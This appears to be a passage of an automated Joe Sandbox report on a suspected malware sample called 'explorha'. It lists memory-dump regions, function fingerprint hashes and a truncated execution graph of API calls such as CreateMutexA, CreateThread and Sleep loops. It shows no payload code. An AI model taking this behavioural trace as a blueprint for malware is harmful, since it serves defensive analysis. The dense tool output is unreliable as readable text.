                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                      • String ID:
                                                                                                      • API String ID: 531285432-0
                                                                                                      • Opcode ID: 9447170ee4043f0a2577b2a236add53114fd9b68638756392da8c3af6b4d2b54
                                                                                                      • Instruction ID: b2324ec4dcd4b6fd0e6677b4478165a7fa83e76010b09ae45e1c1a518705ead0
                                                                                                      • Opcode Fuzzy Hash: 9447170ee4043f0a2577b2a236add53114fd9b68638756392da8c3af6b4d2b54
                                                                                                      • Instruction Fuzzy Hash: 44212C71A002199FDF04EFA8DC819BEBBB8FF48714F104059FA05E7265EA70ED418BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0086DAEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • stoi argument out of range, xrefs: 0086DCFA
                                                                                                      • invalid stoi argument, xrefs: 0086DD04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID: invalid stoi argument$stoi argument out of range
                                                                                                      • API String ID: 1418687624-1606216832
                                                                                                      • Opcode ID: e547145f2ebd976fdabe355eec98bad8ee215013b6c89dd36c9b9c29f9c6d9a4
                                                                                                      • Instruction ID: 5bd817ea33aee4e4be95fefffcb158ed60f5d5fa310a50a8ee353e76da66c271
                                                                                                      • Opcode Fuzzy Hash: e547145f2ebd976fdabe355eec98bad8ee215013b6c89dd36c9b9c29f9c6d9a4
                                                                                                      • Instruction Fuzzy Hash: 2A119E32F00305CBDB24DBA8C841AA9B3B0FF44320F178469E849E7215EB31EC00CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.5%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.3%
                                                                                                      Total number of Nodes:1279
                                                                                                      Total number of Limit Nodes:109
                                                                                                      execution_graph 33231 86a287 GetFileAttributesA 33235 86a297 ListArray 33231->33235 33232 86a362 ListArray 33247 879750 33232->33247 33233 86a41e 33244 8982fa 33233->33244 33235->33232 33235->33233 33236 86a423 Sleep CreateMutexA 33240 86a45e 33236->33240 33239 86a3d3 33241 86a466 33240->33241 33242 897cb9 GetPEB GetPEB RtlAllocateHeap 33240->33242 33243 86a46e 33242->33243 33262 898286 RtlAllocateHeap __cftof __dosmaperr 33244->33262 33246 898309 __cftof 33248 879794 33247->33248 33251 87976e __InternalCxxFrameHandler 33247->33251 33249 87987e 33248->33249 33254 87980d 33248->33254 33255 8797e8 33248->33255 33271 87a900 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33249->33271 33251->33239 33252 879883 33272 862380 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33252->33272 33258 87ea77 Hash 2 API calls 33254->33258 33259 8797f9 std::_Rethrow_future_exception 33254->33259 33255->33252 33263 87ea77 33255->33263 33256 879888 33258->33259 33260 879860 ListArray 33259->33260 33261 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33259->33261 33260->33239 33261->33249 33262->33246 33266 87ea7c Hash 33263->33266 33265 87ea96 33265->33259 33266->33265 33267 862380 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33266->33267 33273 89a204 33266->33273 33268 87eaa2 Concurrency::details::SchedulerBase::Initialize Concurrency::details::ResourceManager::ResourceManager 33267->33268 33279 894f3c RtlAllocateHeap RtlAllocateHeap Concurrency::details::_TaskCollection::_FullAliasWait ___std_exception_copy Concurrency::details::ResourceManager::CleanupTopologyInformation 33267->33279 33270 8623c3 33270->33259 33272->33256 33278 89c66b Hash __dosmaperr 33273->33278 33274 89c6a9 33280 898ba3 RtlAllocateHeap __dosmaperr 33274->33280 33275 89c694 RtlAllocateHeap 33277 89c6a7 33275->33277 33275->33278 33277->33266 33278->33274 33278->33275 33279->33270 33280->33277 33281 868800 33282 86884f 33281->33282 33294 879090 33282->33294 33284 86885f 33308 865d40 33284->33308 33286 86886a 33286->33286 33287 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33286->33287 33288 8688bc 33287->33288 33320 8798b0 33288->33320 33290 86894e __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33291 8688ce ListArray 33291->33290 33292 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33291->33292 33293 86897a 33292->33293 33295 8790b6 33294->33295 33296 8790bd 33295->33296 33297 8790f2 33295->33297 33298 879111 33295->33298 33296->33284 33299 879149 33297->33299 33300 8790f9 33297->33300 33301 879106 std::_Rethrow_future_exception 33298->33301 33304 87ea77 Hash 2 API calls 33298->33304 33328 862380 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::SchedulerBase::Initialize 33299->33328 33303 87ea77 Hash 2 API calls 33300->33303 33301->33284 33305 8790ff 33303->33305 33304->33301 33305->33301 33306 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33305->33306 33307 879153 __Cnd_destroy_in_situ ListArray __Mtx_destroy_in_situ Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::_TaskCollection::~_TaskCollection 33306->33307 33307->33284 33329 865a70 33308->33329 33312 865d9a 33353 864ad0 33312->33353 33314 865e2c ListArray 33315 865e5c __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33314->33315 33318 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33314->33318 33315->33286 33316 865dbd ListArray 33316->33314 33317 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33316->33317 33317->33314 33319 865e8c 33318->33319 33321 8798d8 33320->33321 33322 879922 33320->33322 33321->33322 33323 8798e1 33321->33323 33324 879931 __InternalCxxFrameHandler 33322->33324 33366 87a5d0 2 API calls 4 library calls 33322->33366 33365 87a910 RtlAllocateHeap RtlAllocateHeap __InternalCxxFrameHandler std::_Rethrow_future_exception 33323->33365 33324->33291 33327 8798ea 33327->33291 33328->33305 33360 879610 2 API calls 4 library calls 33329->33360 33331 865a9b 33332 865b10 33331->33332 33361 879610 2 API calls 4 library calls 33332->33361 33334 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33346 865b75 33334->33346 33335 865d39 33363 879890 RtlAllocateHeap RtlAllocateHeap 33335->33363 33336 865d0d __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33336->33312 33338 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33338->33346 33346->33334 33346->33335 33346->33336 33346->33338 33362 865860 RtlAllocateHeap RtlAllocateHeap __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback 33346->33362 33354 864b01 33353->33354 33357 864b2b 33353->33357 33355 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33354->33355 33356 864b18 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33355->33356 33356->33316 33364 879610 2 API calls 4 library calls 33357->33364 33359 864ba1 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 33359->33316 33360->33331 33361->33346 33362->33346 33364->33359 33365->33327 33366->33324 33367 878320 CreateThread CreateThread 33368 878350 Sleep 33367->33368 33369 878200 33367->33369 33375 878290 33367->33375 33368->33368 33372 878230 33369->33372 33370 879090 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 33370->33372 33371 865d40 RtlAllocateHeap RtlAllocateHeap 33371->33372 33372->33370 33372->33371 33386 8748d0 33372->33386 33374 87827c Sleep 33374->33372 33376 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33375->33376 33377 8782cd 33376->33377 33378 865d40 2 API calls 33377->33378 33379 8782d4 33378->33379 33380 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33379->33380 33381 8782ec 33380->33381 33382 865d40 2 API calls 33381->33382 33383 8782f3 33382->33383 34241 877e90 33383->34241 33387 87490b 33386->33387 33390 875003 ListArray 33386->33390 33389 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33387->33389 33387->33390 33388 875079 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z ListArray 33388->33374 33391 87492c 33389->33391 33390->33388 33392 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33390->33392 33393 865d40 2 API calls 33391->33393 33394 8750da 33392->33394 33395 874933 33393->33395 33676 866160 33394->33676 33396 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33395->33396 33397 874945 33396->33397 33399 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33397->33399 33401 874957 33399->33401 33400 875135 33707 8664d0 33400->33707 33403 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33401->33403 33406 874978 33403->33406 33404 8751fe ListArray 33720 8678b0 33404->33720 33409 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33406->33409 33407 876d66 33411 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33407->33411 33408 87520d 33799 8644b0 33408->33799 33413 874990 33409->33413 33410 875145 ListArray 33410->33404 33410->33407 33414 876d89 33411->33414 33416 865d40 2 API calls 33413->33416 33415 87521a 33803 867e50 33415->33803 33418 874997 33416->33418 33667 868050 33418->33667 33419 875226 33421 8644b0 2 API calls 33419->33421 33423 875233 33421->33423 33422 8749a3 33425 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33422->33425 33525 874c29 33422->33525 33430 8644b0 2 API calls 33423->33430 33424 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33427 874c4f 33424->33427 33426 8749bf 33425->33426 33428 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33426->33428 33429 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33427->33429 33432 8749d7 33428->33432 33433 874c64 33429->33433 33431 875250 33430->33431 33434 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33431->33434 33435 865d40 2 API calls 33432->33435 33436 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33433->33436 33437 87526e 33434->33437 33438 8749de 33435->33438 33439 874c76 33436->33439 33440 865d40 2 API calls 33437->33440 33441 868050 2 API calls 33438->33441 33445 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33439->33445 33442 875275 33440->33442 33443 8749ea 33441->33443 33444 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33442->33444 33447 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33443->33447 33443->33525 33446 87528a 33444->33446 33448 874c97 33445->33448 33449 865d40 2 API calls 33446->33449 33450 874a07 33447->33450 33451 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33448->33451 33452 875291 33449->33452 33453 865d40 2 API calls 33450->33453 33454 874caf 33451->33454 33819 865e90 33452->33819 33459 874a0f 33453->33459 33456 865d40 2 API calls 33454->33456 33457 874cb6 33456->33457 33458 868050 2 API calls 33457->33458 33460 874cc2 33458->33460 33461 87509e 33459->33461 33462 874a5b 33459->33462 33465 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33460->33465 33472 874f90 ListArray 33460->33472 34168 879890 RtlAllocateHeap RtlAllocateHeap 33461->34168 33464 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33462->33464 33478 874a79 ListArray 33464->33478 33468 874cde 33465->33468 33466 8752a3 33469 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33466->33469 33467 8750a3 33470 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33467->33470 33471 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33468->33471 33484 87530c 33469->33484 33474 8750a8 33470->33474 33475 874cf6 33471->33475 33472->33390 33473 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33472->33473 33473->33390 33476 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33474->33476 33477 865d40 2 API calls 33475->33477 33481 8750ad 33476->33481 33482 874cfd 33477->33482 33478->33467 33487 874aed ListArray 33478->33487 33479 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33480 874b06 33479->33480 33483 865d40 2 API calls 33480->33483 34169 87d829 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::SchedulerBase::Initialize 33481->34169 33486 868050 2 API calls 33482->33486 33496 874b0e 33483->33496 33830 879470 33484->33830 33490 874d09 33486->33490 33487->33479 33489 8750b7 34170 879890 RtlAllocateHeap RtlAllocateHeap 33489->34170 33490->33472 33495 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33490->33495 33491 875378 33849 878df0 33491->33849 33494 8750bc 34171 87d869 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::SchedulerBase::Initialize 33494->34171 33498 874d26 33495->33498 33499 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33496->33499 33501 865d40 2 API calls 33498->33501 33508 874b69 ListArray 33499->33508 33500 8750c6 33502 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33500->33502 33509 874d2e 33501->33509 33504 8750cb 33502->33504 33503 8753d7 33512 875455 ListArray 33503->33512 34172 87a330 2 API calls 5 library calls 33503->34172 33507 8982fa Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 33504->33507 33506 874bdd ListArray 33506->33525 33863 8693c0 2 API calls 4 library calls 33506->33863 33507->33472 33508->33474 33508->33506 33509->33489 33510 874d7a 33509->33510 33513 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33510->33513 33516 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33512->33516 33520 874d98 ListArray 33513->33520 33514 874bf5 33514->33525 33864 898ba3 RtlAllocateHeap __dosmaperr 33514->33864 33526 87551d ListArray 33516->33526 33517 874bfe 33865 89a0d9 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 33517->33865 33518 874e0c ListArray 33519 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33518->33519 33522 874e25 33519->33522 33520->33500 33520->33518 33524 865d40 2 API calls 33522->33524 33523 874c1d 33523->33481 33523->33525 33530 874e2d 33524->33530 33525->33424 33525->33494 33527 8644b0 2 API calls 33526->33527 33528 8755bd 33527->33528 33529 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33528->33529 33531 8755d7 33529->33531 33532 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33530->33532 33533 865d40 2 API calls 33531->33533 33538 874e88 ListArray 33532->33538 33534 8755e2 33533->33534 33535 8644b0 2 API calls 33534->33535 33537 8755f7 33535->33537 33536 874efc ListArray 33539 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33536->33539 33540 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33537->33540 33538->33504 33538->33536 33541 874f17 33539->33541 33542 87560b 33540->33542 33544 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33541->33544 33543 865d40 2 API calls 33542->33543 33545 875616 33543->33545 33546 874f2c 33544->33546 33547 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33545->33547 33548 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33546->33548 33549 875634 33547->33549 33550 874f47 33548->33550 33551 865d40 2 API calls 33549->33551 33552 865d40 2 API calls 33550->33552 33553 87563f 33551->33553 33554 874f4e 33552->33554 33555 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33553->33555 33557 879750 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33554->33557 33556 87565d 33555->33556 33558 865d40 2 API calls 33556->33558 33559 874f87 33557->33559 33560 875668 33558->33560 33866 8744b0 33559->33866 33562 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33560->33562 33563 875686 33562->33563 33564 865d40 2 API calls 33563->33564 33565 875691 33564->33565 33566 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33565->33566 33567 8756af 33566->33567 33568 865d40 2 API calls 33567->33568 33569 8756ba 33568->33569 33570 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33569->33570 33571 8756d8 33570->33571 33572 865d40 2 API calls 33571->33572 33573 8756e3 33572->33573 33574 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33573->33574 33575 875701 33574->33575 33576 865d40 2 API calls 33575->33576 33577 87570c 33576->33577 33578 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33577->33578 33579 87572a 33578->33579 33580 865d40 2 API calls 33579->33580 33581 875735 33580->33581 33582 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33581->33582 33583 875751 33582->33583 33584 865d40 2 API calls 33583->33584 33585 87575c 33584->33585 33586 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33585->33586 33587 875773 33586->33587 33588 865d40 2 API calls 33587->33588 33589 87577e 33588->33589 33590 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33589->33590 33591 875795 33590->33591 33592 865d40 2 API calls 33591->33592 33593 8757a0 33592->33593 33594 879090 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 33593->33594 33595 8757bc 33594->33595 33596 865d40 2 API calls 33595->33596 33597 8757c7 33596->33597 34173 8799b0 33597->34173 33599 8757db 33600 8798b0 2 API calls 33599->33600 33601 8757ef 33600->33601 33602 8798b0 2 API calls 33601->33602 33603 875803 33602->33603 33604 8798b0 2 API calls 33603->33604 33605 875817 33604->33605 33606 8799b0 2 API calls 33605->33606 33607 87582b 33606->33607 33608 8798b0 2 API calls 33607->33608 33609 87583f 33608->33609 33610 8799b0 2 API calls 33609->33610 33611 875853 33610->33611 33612 8798b0 2 API calls 33611->33612 33613 875867 33612->33613 33614 8799b0 2 API calls 33613->33614 33615 87587b 33614->33615 33616 8798b0 2 API calls 33615->33616 33617 87588f 33616->33617 33618 8799b0 2 API calls 33617->33618 33619 8758a3 33618->33619 33620 8798b0 2 API calls 33619->33620 33621 8758b7 33620->33621 33622 8799b0 2 API calls 33621->33622 33623 8758cb 33622->33623 33624 8798b0 2 API calls 33623->33624 33625 8758df 33624->33625 33626 8799b0 2 API calls 33625->33626 33627 8758f3 33626->33627 33628 8798b0 2 API calls 33627->33628 33629 875907 33628->33629 33630 8799b0 2 API calls 33629->33630 33631 87591b 33630->33631 33632 8798b0 2 API calls 33631->33632 33633 87592f 33632->33633 33634 8799b0 2 API calls 33633->33634 33635 875943 33634->33635 33636 8798b0 2 API calls 33635->33636 33637 875957 33636->33637 33638 8798b0 2 API calls 33637->33638 33639 87596b 33638->33639 33640 8798b0 2 API calls 